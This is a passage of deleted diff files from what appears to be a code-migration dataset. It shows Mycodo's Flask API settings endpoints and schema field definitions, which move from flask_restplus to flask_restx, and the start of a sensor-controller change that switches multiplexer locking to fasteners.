mycodo.mycodo_flask.api.sql_schema_fields import math_fields -from mycodo.mycodo_flask.api.sql_schema_fields import measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import output_fields -from mycodo.mycodo_flask.api.sql_schema_fields import pid_fields -from mycodo.mycodo_flask.api.sql_schema_fields import trigger_fields -from mycodo.mycodo_flask.api.sql_schema_fields import unit_fields -from mycodo.mycodo_flask.api.sql_schema_fields import user_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_settings = api.namespace('settings', description='Settings operations') - -device_measurement_list_fields = ns_settings.model( - 'Device Measurement Settings Fields List', { - 'device measurement settings': fields.List(fields.Nested( - device_measurement_fields)), - } -) - -input_list_fields = ns_settings.model('Input Settings Fields List', { - 'input settings': fields.List(fields.Nested(input_fields)), -}) - -math_list_fields = ns_settings.model('Math Settings Fields List', { - 'math settings': fields.List(fields.Nested(math_fields)), -}) - -measurement_list_fields = ns_settings.model( - 'Measurement Settings Fields List', { - 'measurement settings': fields.List( - fields.Nested(device_measurement_fields)), - } -) - -output_list_fields = ns_settings.model('Output Settings Fields List', { - 'output settings': fields.List(fields.Nested(output_fields)), -}) - -pid_list_fields = ns_settings.model('PID Settings Fields List', { - 'pid settings': fields.List(fields.Nested(pid_fields)), -}) - -trigger_list_fields = ns_settings.model('Trigger Settings Fields List', { - 'trigger settings': fields.List(fields.Nested(trigger_fields)), -}) - -unit_list_fields = ns_settings.model('Unit Settings Fields List', { - 'unit settings': fields.List(fields.Nested(unit_fields)), -}) - -user_list_fields = ns_settings.model('User Settings Fields List', { - 'user settings': fields.List(fields.Nested(user_fields)), -}) - - -@ns_settings.route('/device_measurements') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsDeviceMeasurements(Resource): - """Interacts with device measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(device_measurement_list_fields) - @flask_login.login_required - def get(self): - """Show all device measurement settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db( - DeviceMeasurementsSchema, DeviceMeasurements) - if list_data: - return {'device measurement settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/device_measurements/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the measurement'} -) -class SettingsDeviceMeasurementsUniqueID(Resource): - """Interacts with device measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(device_measurement_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a device measurement with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db( - DeviceMeasurementsSchema, - DeviceMeasurements, - unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/device_measurements/by_device_id/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'device_id': 'The unique ID of the controller (Input, Math, ' - 'etc.) for which the measurement belongs.'} -) -class SettingsDeviceMeasurementsDeviceID(Resource): - """Interacts with device measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(device_measurement_list_fields) - @flask_login.login_required - def get(self, device_id): - """Show the settings for all device measurements with the device_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=device_id).all(), many=True)) - if list_data: - return {'device measurement settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/inputs') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsInputs(Resource): - """Interacts with input settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(input_list_fields) - @flask_login.login_required - def get(self): - """Show all input settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(InputSchema, Input) - if list_data: - return {'input settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/inputs/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the input'} -) -class SettingsInputsUniqueID(Resource): - """Interacts with input settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(input_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an input""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(InputSchema, Input, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/maths') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsMaths(Resource): - """Interacts with math settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(math_list_fields) - @flask_login.login_required - def get(self): - """Show all math settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(MathSchema, Math) - if list_data: - return {'math settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/maths/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the math'} -) -class SettingsMathsUniqueID(Resource): - """Interacts with math settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(math_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an math""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(MathSchema, Math, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/measurements') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsMeasurements(Resource): - """Interacts with measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(measurement_list_fields) - @flask_login.login_required - def get(self): - """Show all measurement settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(MeasurementSchema, Measurement) - if list_data: - return {'measurement settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/measurements/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the measurement'} -) -class SettingsMeasurementsUniqueID(Resource): - """Interacts with measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(measurement_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a measurement with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db( - MeasurementSchema, Measurement, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/outputs') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsOutputs(Resource): - """Interacts with output settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(output_list_fields) - @flask_login.login_required - def get(self): - """Show all output settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(OutputSchema, Output) - if list_data: - return {'output settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/outputs/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the output'} -) -class SettingsOutputsUniqueID(Resource): - """Interacts with output settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(output_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an output with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(OutputSchema, Output, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/pids') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsPIDs(Resource): - """Interacts with PID settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(pid_list_fields) - @flask_login.login_required - def get(self): - """Show all pid settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(PIDSchema, PID) - if list_data: - return {'pid settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/pids/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the pid'} -) -class SettingsPIDsUniqueID(Resource): - """Interacts with PID settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(pid_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a pid with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(PIDSchema, PID, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/triggers') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsTriggers(Resource): - """Interacts with Trigger settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(trigger_list_fields) - @flask_login.login_required - def get(self): - """Show all trigger settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(TriggerSchema, Trigger) - if list_data: - return {'trigger settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/triggers/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the trigger'} -) -class SettingsTriggersUniqueID(Resource): - """Interacts with Trigger settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(trigger_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a trigger with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(TriggerSchema, Trigger, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/units') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsUnits(Resource): - """Interacts with Unit settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(unit_list_fields) - @flask_login.login_required - def get(self): - """Show all unit settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(UnitSchema, Unit) - if list_data: - return {'unit settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/units/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the unit'} -) -class SettingsUnitsUniqueID(Resource): - """Interacts with unit settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(unit_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a unit with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(UnitSchema, Unit, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/users') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsUsers(Resource): - """Interacts with User settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(user_list_fields) - @flask_login.login_required - def get(self): - """Show all user settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(UserSchema, User) - if list_data: - return {'user settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/users/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the user'} -) -class SettingsUsersUniqueID(Resource): - """Interacts with user settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(user_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a user with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - - try: - dict_data = get_from_db(UserSchema, User, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.diff deleted file mode 100644 index cb64232..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.diff +++ /dev/null @@ -1,11 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/sql_schema_fields.py b/mycodo/mycodo_flask/api/sql_schema_fields.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/sql_schema_fields.py - +++ b/mycodo/mycodo_flask/api/sql_schema_fields.py -@@ -1,5 +1,5 @@ - # coding=utf-8 --from flask_restplus import fields -+from flask_restx import fields - - from mycodo.mycodo_flask.api import api - diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.source.py deleted file mode 100644 index 877363a..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.source.py +++ /dev/null @@ -1,243 +0,0 @@ -# coding=utf-8 -from flask_restplus import fields - -from mycodo.mycodo_flask.api import api - -device_measurement_fields = api.model('Device Measurement Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'device_type': fields.String, - 'device_id': fields.String, - 'is_enabled': fields.Boolean, - 'measurement': fields.String, - 'measurement_type': fields.String, - 'unit': fields.String, - 'channel': fields.Integer, - 'invert_scale': fields.Boolean, - 'rescaled_measurement': fields.String, - 'rescaled_unit': fields.String, - 'scale_from_min': fields.Float, - 'scale_from_max': fields.Float, - 'scale_to_min': fields.Float, - 'scale_to_max': fields.Float, - 'conversion_id': fields.String, -}) - -input_fields = api.model('Input Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'is_activated': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'is_preset': fields.Boolean, - 'preset_name': fields.String, - 'device': fields.String, - 'interface': fields.String, - 'period': fields.Float, - 'start_offset': fields.Float, - 'power_output_id': fields.String, - 'resolution': fields.Integer, - 'resolution_2': fields.Integer, - 'sensitivity': fields.Integer, - 'thermocouple_type': fields.String, - 'ref_ohm': fields.Integer, - 'calibrate_sensor_measure': fields.String, - 'location': fields.String, - 'gpio_location': fields.Integer, - 'i2c_location': fields.String, - 'i2c_bus': fields.Integer, - 'ftdi_location': fields.String, - 'uart_location': fields.String, - 'baud_rate': fields.Integer, - 'pin_clock': fields.Integer, - 'pin_cs': fields.Integer, - 'pin_mosi': fields.Integer, - 'pin_miso': fields.Integer, - 'bt_adapter': fields.String, - 'switch_edge': fields.String, - 'switch_bouncetime': fields.Integer, - 'switch_reset_period': fields.Integer, - 'pre_output_id': fields.String, - 'pre_output_duration': fields.Float, - 'pre_output_during_measure': fields.Boolean, - 'sht_voltage': fields.String, - 'adc_gain': fields.Integer, - 'adc_resolution': fields.Integer, - 'adc_sample_speed': fields.String, - 'cmd_command': fields.String, - 'weighting': fields.Float, - 'rpm_pulses_per_rev': fields.Float, - 'sample_time': fields.Float, - 'port': fields.Integer, - 'times_check': fields.Integer, - 'deadline': fields.Integer, - 'datetime': fields.DateTime, - 'custom_options': fields.String -}) - -math_fields = api.model('Math Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'math_type': fields.String, - 'is_activated': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'period': fields.Float, - 'start_offset': fields.Float, - 'max_measure_age': fields.Integer, - 'order_of_use': fields.String, - 'difference_reverse_order': fields.Boolean, - 'difference_absolute': fields.Boolean, - 'equation_input': fields.String, - 'equation': fields.String, - 'max_difference': fields.Float, - 'inputs': fields.String, - 'dry_bulb_t_id': fields.String, - 'dry_bulb_t_measure_id': fields.String, - 'wet_bulb_t_id': fields.String, - 'wet_bulb_t_measure_id': fields.String, - 'pressure_pa_id': fields.String, - 'pressure_pa_measure_id': fields.String, - 'unique_id_1': fields.String, - 'unique_measurement_id_1': fields.String, - 'unique_id_2': fields.String, - 'unique_measurement_id_2': fields.String, -}) - -measurement_fields = api.model('Measurement Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name_safe': fields.String, - 'name': fields.String, - 'units': fields.String -}) - -output_fields = api.model('Output Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'output_type': fields.String, - 'output_mode': fields.String, - 'interface': fields.String, - 'location': fields.String, - 'i2c_bus': fields.Integer, - 'baud_rate': fields.Integer, - 'name': fields.String, - 'measurement': fields.String, - 'unit': fields.String, - 'conversion_id': fields.String, - 'channel': fields.Integer, - 'pin': fields.Integer, - 'on_state': fields.Boolean, - 'amps': fields.Float, - 'on_until': fields.DateTime, - 'off_until': fields.DateTime, - 'last_duration': fields.Float, - 'on_duration': fields.Boolean, - 'protocol': fields.Integer, - 'pulse_length': fields.Integer, - 'on_command': fields.String, - 'off_command': fields.String, - 'pwm_command': fields.String, - 'trigger_functions_at_start': fields.Boolean, - 'state_startup': fields.String, - 'startup_value': fields.Float, - 'state_shutdown': fields.String, - 'shutdown_value': fields.Float, - 'pwm_hertz': fields.Integer, - 'pwm_library': fields.String, - 'pwm_invert_signal': fields.Boolean, - 'flow_rate': fields.Float -}) - -pid_fields = api.model('PID Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'is_activated': fields.Boolean, - 'is_held': fields.Boolean, - 'is_paused': fields.Boolean, - 'is_preset': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'preset_name': fields.String, - 'period': fields.Float, - 'start_offset': fields.Float, - 'max_measure_age': fields.Float, - 'measurement': fields.String, - 'direction': fields.String, - 'setpoint': fields.Float, - 'band': fields.Float, - 'p': fields.Float, - 'i': fields.Float, - 'd': fields.Float, - 'integrator_min': fields.Float, - 'integrator_max': fields.Float, - 'raise_output_id': fields.String, - 'raise_min_duration': fields.Float, - 'raise_max_duration': fields.Float, - 'raise_min_off_duration': fields.Float, - 'lower_output_id': fields.String, - 'lower_min_duration': fields.Float, - 'lower_max_duration': fields.Float, - 'lower_min_off_duration': fields.Float, - 'store_lower_as_negative': fields.Boolean, - 'setpoint_tracking_type': fields.String, - 'setpoint_tracking_id': fields.String, - 'setpoint_tracking_max_age': fields.Float, - 'method_start_time': fields.String, - 'method_end_time': fields.String, - 'autotune_activated': fields.Boolean, - 'autotune_noiseband': fields.Float, - 'autotune_outstep': fields.Float -}) - -trigger_fields = api.model('Trigger Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'trigger_type': fields.String, - 'name': fields.String, - 'is_activated': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'unique_id_1': fields.String, - 'unique_id_2': fields.String, - 'output_state': fields.String, - 'output_duration': fields.Float, - 'output_duty_cycle': fields.Float, - 'rise_or_set': fields.String, - 'latitude': fields.Float, - 'longitude': fields.Float, - 'zenith': fields.Float, - 'date_offset_days': fields.Integer, - 'time_offset_minutes': fields.Integer, - 'period': fields.Float, - 'timer_start_offset': fields.Integer, - 'timer_start_time': fields.String, - 'timer_end_time': fields.String, - 'program': fields.String, - 'word': fields.String, - 'method_start_time': fields.String, - 'method_end_time': fields.String, - 'trigger_actions_at_period': fields.Boolean, - 'trigger_actions_at_start': fields.Boolean, - 'measurement': fields.String, - 'edge_detected': fields.String, -}) - -unit_fields = api.model('Unit Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name_safe': fields.String, - 'name': fields.String, - 'unit': fields.String -}) - -user_fields = api.model('User Settings Fields', { - "id": fields.Integer, - "unique_id": fields.String, - "name": fields.String, - "email": fields.String, - "role_id": fields.Integer, - "theme": fields.String, - "landing_page": fields.String, - "language": fields.String -}) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.target.py deleted file mode 100644 index af682b9..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.target.py +++ /dev/null @@ -1,243 +0,0 @@ -# coding=utf-8 -from flask_restx import fields - -from mycodo.mycodo_flask.api import api - -device_measurement_fields = api.model('Device Measurement Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'device_type': fields.String, - 'device_id': fields.String, - 'is_enabled': fields.Boolean, - 'measurement': fields.String, - 'measurement_type': fields.String, - 'unit': fields.String, - 'channel': fields.Integer, - 'invert_scale': fields.Boolean, - 'rescaled_measurement': fields.String, - 'rescaled_unit': fields.String, - 'scale_from_min': fields.Float, - 'scale_from_max': fields.Float, - 'scale_to_min': fields.Float, - 'scale_to_max': fields.Float, - 'conversion_id': fields.String, -}) - -input_fields = api.model('Input Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'is_activated': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'is_preset': fields.Boolean, - 'preset_name': fields.String, - 'device': fields.String, - 'interface': fields.String, - 'period': fields.Float, - 'start_offset': fields.Float, - 'power_output_id': fields.String, - 'resolution': fields.Integer, - 'resolution_2': fields.Integer, - 'sensitivity': fields.Integer, - 'thermocouple_type': fields.String, - 'ref_ohm': fields.Integer, - 'calibrate_sensor_measure': fields.String, - 'location': fields.String, - 'gpio_location': fields.Integer, - 'i2c_location': fields.String, - 'i2c_bus': fields.Integer, - 'ftdi_location': fields.String, - 'uart_location': fields.String, - 'baud_rate': fields.Integer, - 'pin_clock': fields.Integer, - 'pin_cs': fields.Integer, - 'pin_mosi': fields.Integer, - 'pin_miso': fields.Integer, - 'bt_adapter': fields.String, - 'switch_edge': fields.String, - 'switch_bouncetime': fields.Integer, - 'switch_reset_period': fields.Integer, - 'pre_output_id': fields.String, - 'pre_output_duration': fields.Float, - 'pre_output_during_measure': fields.Boolean, - 'sht_voltage': fields.String, - 'adc_gain': fields.Integer, - 'adc_resolution': fields.Integer, - 'adc_sample_speed': fields.String, - 'cmd_command': fields.String, - 'weighting': fields.Float, - 'rpm_pulses_per_rev': fields.Float, - 'sample_time': fields.Float, - 'port': fields.Integer, - 'times_check': fields.Integer, - 'deadline': fields.Integer, - 'datetime': fields.DateTime, - 'custom_options': fields.String -}) - -math_fields = api.model('Math Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'math_type': fields.String, - 'is_activated': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'period': fields.Float, - 'start_offset': fields.Float, - 'max_measure_age': fields.Integer, - 'order_of_use': fields.String, - 'difference_reverse_order': fields.Boolean, - 'difference_absolute': fields.Boolean, - 'equation_input': fields.String, - 'equation': fields.String, - 'max_difference': fields.Float, - 'inputs': fields.String, - 'dry_bulb_t_id': fields.String, - 'dry_bulb_t_measure_id': fields.String, - 'wet_bulb_t_id': fields.String, - 'wet_bulb_t_measure_id': fields.String, - 'pressure_pa_id': fields.String, - 'pressure_pa_measure_id': fields.String, - 'unique_id_1': fields.String, - 'unique_measurement_id_1': fields.String, - 'unique_id_2': fields.String, - 'unique_measurement_id_2': fields.String, -}) - -measurement_fields = api.model('Measurement Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name_safe': fields.String, - 'name': fields.String, - 'units': fields.String -}) - -output_fields = api.model('Output Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'output_type': fields.String, - 'output_mode': fields.String, - 'interface': fields.String, - 'location': fields.String, - 'i2c_bus': fields.Integer, - 'baud_rate': fields.Integer, - 'name': fields.String, - 'measurement': fields.String, - 'unit': fields.String, - 'conversion_id': fields.String, - 'channel': fields.Integer, - 'pin': fields.Integer, - 'on_state': fields.Boolean, - 'amps': fields.Float, - 'on_until': fields.DateTime, - 'off_until': fields.DateTime, - 'last_duration': fields.Float, - 'on_duration': fields.Boolean, - 'protocol': fields.Integer, - 'pulse_length': fields.Integer, - 'on_command': fields.String, - 'off_command': fields.String, - 'pwm_command': fields.String, - 'trigger_functions_at_start': fields.Boolean, - 'state_startup': fields.String, - 'startup_value': fields.Float, - 'state_shutdown': fields.String, - 'shutdown_value': fields.Float, - 'pwm_hertz': fields.Integer, - 'pwm_library': fields.String, - 'pwm_invert_signal': fields.Boolean, - 'flow_rate': fields.Float -}) - -pid_fields = api.model('PID Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'is_activated': fields.Boolean, - 'is_held': fields.Boolean, - 'is_paused': fields.Boolean, - 'is_preset': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'preset_name': fields.String, - 'period': fields.Float, - 'start_offset': fields.Float, - 'max_measure_age': fields.Float, - 'measurement': fields.String, - 'direction': fields.String, - 'setpoint': fields.Float, - 'band': fields.Float, - 'p': fields.Float, - 'i': fields.Float, - 'd': fields.Float, - 'integrator_min': fields.Float, - 'integrator_max': fields.Float, - 'raise_output_id': fields.String, - 'raise_min_duration': fields.Float, - 'raise_max_duration': fields.Float, - 'raise_min_off_duration': fields.Float, - 'lower_output_id': fields.String, - 'lower_min_duration': fields.Float, - 'lower_max_duration': fields.Float, - 'lower_min_off_duration': fields.Float, - 'store_lower_as_negative': fields.Boolean, - 'setpoint_tracking_type': fields.String, - 'setpoint_tracking_id': fields.String, - 'setpoint_tracking_max_age': fields.Float, - 'method_start_time': fields.String, - 'method_end_time': fields.String, - 'autotune_activated': fields.Boolean, - 'autotune_noiseband': fields.Float, - 'autotune_outstep': fields.Float -}) - -trigger_fields = api.model('Trigger Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'trigger_type': fields.String, - 'name': fields.String, - 'is_activated': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'unique_id_1': fields.String, - 'unique_id_2': fields.String, - 'output_state': fields.String, - 'output_duration': fields.Float, - 'output_duty_cycle': fields.Float, - 'rise_or_set': fields.String, - 'latitude': fields.Float, - 'longitude': fields.Float, - 'zenith': fields.Float, - 'date_offset_days': fields.Integer, - 'time_offset_minutes': fields.Integer, - 'period': fields.Float, - 'timer_start_offset': fields.Integer, - 'timer_start_time': fields.String, - 'timer_end_time': fields.String, - 'program': fields.String, - 'word': fields.String, - 'method_start_time': fields.String, - 'method_end_time': fields.String, - 'trigger_actions_at_period': fields.Boolean, - 'trigger_actions_at_start': fields.Boolean, - 'measurement': fields.String, - 'edge_detected': fields.String, -}) - -unit_fields = api.model('Unit Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name_safe': fields.String, - 'name': fields.String, - 'unit': fields.String -}) - -user_fields = api.model('User Settings Fields', { - "id": fields.Integer, - "unique_id": fields.String, - "name": fields.String, - "email": fields.String, - "role_id": fields.Integer, - "theme": fields.String, - "landing_page": fields.String, - "language": fields.String -}) diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.diff b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.diff deleted file mode 100644 index 39b7bb3..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.diff +++ /dev/null @@ -1,306 +0,0 @@ -diff --git a/mycodo/controller_sensor.py b/mycodo/controller_sensor.py - index a193e1e85f246694defb54c3cfe3ea658368ac3c..547f6d9f22e569007c1066e36ee5142f5e1b533d 100644 - --- a/mycodo/controller_sensor.py - +++ b/mycodo/controller_sensor.py -@@ -23,12 +23,12 @@ - # Contact at kylegabriel.com - - import logging -+import fasteners - import requests - import threading - import time - import timeit - import RPi.GPIO as GPIO --from lockfile import LockFile - - from mycodo_client import DaemonControl - from databases.models import Camera -@@ -223,6 +223,8 @@ class SensorController(threading.Thread): - self.mux_address = int(str(self.mux_address_raw), 16) - self.mux_lock = "/var/lock/mycodo_multiplexer_0x{i2c:02X}.pid".format( - i2c=self.mux_address) -+ self.mux_lock = fasteners.InterProcessLock(self.mux_lock) -+ self.mux_lock_acquired = False - self.multiplexer = TCA9548A(self.mux_bus, self.mux_address) - else: - self.multiplexer = None -@@ -240,7 +242,9 @@ class SensorController(threading.Thread): - else: - self.switch_edge_gpio = GPIO.BOTH - -- self.lock_multiplexer() -+ # Lock multiplexer, if it's enabled -+ if self.multiplexer: -+ self.lock_multiplexer() - - # Set up analog-to-digital converter - if self.device == 'ADS1x15': -@@ -369,7 +373,8 @@ class SensorController(threading.Thread): - raise Exception("'{device}' is not a valid device type.".format( - device=self.device)) - -- self.unlock_multiplexer() -+ if self.multiplexer: -+ self.unlock_multiplexer() - - self.edge_reset_timer = time.time() - self.sensor_timer = time.time() -@@ -681,37 +686,99 @@ class SensorController(threading.Thread): - - def lock_multiplexer(self): - """ Acquire a multiplexer lock """ -- if self.multiplexer: -- (lock_status, -- lock_response) = self.setup_lock(self.mux_address, -- self.mux_bus, -- self.mux_lock) -- if not lock_status: -- 